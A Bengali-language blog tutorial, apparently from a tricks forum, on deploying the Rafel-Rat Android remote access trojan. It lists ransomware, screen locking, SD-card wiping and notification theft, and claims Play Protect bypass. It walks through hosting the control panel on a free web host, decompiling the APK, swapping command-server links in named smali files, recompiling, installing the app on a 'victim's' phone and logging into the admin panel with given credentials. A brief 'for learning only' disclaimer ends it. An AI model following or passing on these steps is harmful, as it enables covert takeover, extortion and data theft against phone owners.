Howdy,

সবাই কেমন আছেন,  আশা করি ভালো আছেন।

আজকে আপনাদের সামনে হাজির হলাম নতুন একটা android rat নিয়ে । এর অনেক গুলো পোস্ট করা আছে রাট নিয়ে তারপর দিচ্ছি।  আজকের রাটের নাম হচ্ছে Rafel-Rat ।

Rafel-Rat কি?  

Android rat কি তা আমরা বর্তমান সময়ে সবাই জানি। তাই রাট নিয়ে আলোচনা করে আপনার সময় নষ্ট করবো না।  আজকের রাট টা অন্য গুলোর থেকে একটু আলাদা।  তো নিচে কিছু আলোচনা করা যাক।

Rafel দিয়ে সবচেয়ে গুরুত্বপূর্ণ কাজ হচ্ছে Ransomware attack করা যায়।  rafel এর ফিউচার গুলো জানা যাক।

Main Futures : 

1. Admin permission
2. Add app to white list (ignore battery optimization)
3. Looks like legit mod app
4. Runs in background even app is closed ( may not work on some device)  
5. Accessibility Feature ( Cause Error in some device –> ignore it)
6. Support android v5-v12
7. No port forwarding needed
8. Acquire Wakelock
9. Fully undetectable
10. Bypass playprotect
11. WipeSdCard
12. Lock device Screen
13. Change wallpaper
14. Ransomware
15. vibrate device
16. Delete calls logs
17. Steal notifications(send through discord) 
18. Added AutoStart for ( poco, Xiaomi, Oppo, vivo, Honor) 

 যা যা লাগবে : 

1. Android Studio
2. or
3. ApkEasyTool

চলুন শুরু করা যাক।

প্রথমে আমার দেওয়া Zip ফাইলটি ডাউনলোড করে নিবেন।

Download

pass:trickbd

আমাদের দরকার একটা সার্ভার সেই জন্য আমরা 000webhosing কে বেচে নিলাম। ওয়েবসাইটে গিয়ে ফ্রী একটা অ্যাকাউন্ট করে নিবো।

Server Website

নাম,  পাসওয়ার্ড দিয়ে একটা অ্যাকাউন্ট করে নিবো।

এই রকম আসবে আমরা public HTML এ চলে যাবো।

 

আমার দেওয়া zip কে unzip করলে unzip.PHP ফাইলটি পাবেন সেটা আমরা সার্ভার আপলোড করে দিবো।

Server panel ফোল্ডারকে আমরা zip file করে নিবো।

এখন server panel zip ফাইলটি সার্ভার আপলোড করে দিবো।

এখন unzip.PHP উপর মাউস রেখে রাইট ক্লিক করে view তে চলে যাবো।

আমরা যে একটু আগে server panel.zip ফাইল আপলোড করছি তার নাম সঠিক ভাবে দিয়ে unzip ক্লিক করবো।

এখন আমরা দুইটা ফাইল দেখতে পারবো সার্ভারে server panel.zip যেই ফাইলটি থাকবে সেটা ডিলিট করে দিবো।

সার্ভার ফোল্ডারে প্রবেশ করলে আমরা commands.php ফাইল পাবো। তার উপর রাইট ক্লিক করে view তে ক্লিক করবো ।

এরপর এই রকম আসলে আমরা লিঃকটা কপি করে নিবো।

আমার দেওয়া zip ফাইলে এই অ্যাপসটি থাকবে তাকে এখন আমরা decompile করবো।  তার জন্য আমি ব্যবহার করছি ApkEasyTools।

অ্যাপসটি লোড করে decompile ক্লিক করবো।

Decompile শেষ হলে আমরা সেই ফোল্ডারে চলে যাবো তারপর smali_classes2/com/velociraptor/repator চলে যাবো। তাহলেই internalservice.smali পেয়ে যাবো এখন তাকে notepad ++ দিয়ে ওপেন করো।

এখানে যে লিঃক তা ডিলিট করে আমরা যে লিংক কপি করছি সেটা পেস্ট করে দিবো তারপর সেইভ করে দিবো।

একই ভাবে এখন ওপেন করবো notificationlistener.smali

Notepad ++ দিয়ে ওপেন করবো।

এখানে অনেক বড় একটা লিংক পাবেন সেটা ডিলিট করে আমাদের কপি করা লিঃকটা পেস্ট করে দিবো এবং সেইভ করা দিবো।

 

এখন আমরা একটু আগে decompile করে  যে ফাইলটা পেলায় তাকে এখন compile করবো।

Decompile ফাইলটি লোড করে compile ক্লিক করবো।

Compile হলে আমরা ভিকটিমের ফোনে অ্যাপসটি ইনস্টল করবো।

এখন আমরা চলে যাবো আমাদের সার্ভারের admin panel এ ।

https://abirhossen.000webhostapp.com/Server_Panel/public/login.php

 

এইরকম আসলে আমার দেওয়া username or pass দিয়ে লগইন করবেন।

1. Enter Username Hande
2. Password Ercel

এই রকম দেখতে পাবো এখন attack ক্লিক করবো।

ফোনের সকল ইনফো পেয়ে যাবো।  এখন ইচ্ছে মতো কাজ করতে পারেন।

Video link 

 

সতর্কবার্তা

সবার উদ্দেশ্য করে বলছি আমি শুধু আপনাদের শিখানোর জন্য এই গুলো দেওয়া আশা করি এইসব নিয়ে কেউ খারাপ কাজে ব্যবহার করবেন না। যদি করে থাকেন আমি এবং  trickbd দায়ী থাকবো না।

অন্যের ক্ষতি করলে একদিন না একদিন নিজের ও ক্ষতি হবে এই কথাটা সবাই মাথায় রাখবেন।

কিছু সমস্যা : 

• Apps decompile করতে সমস্যা হলে window এ Java install করে নিবেন। 
• সব ফোনে কাজ করবে না তাই যাদের ইনস্টল করতে সমস্যা হবে তারা playProtection অফ করে নিবেন।

তো আজকে এই পর্যন্তই ভালো থাকবেন সুস্থ থাকবেন আল্লাহ্ হাফেজ।

Facebook

YouTube

Telegram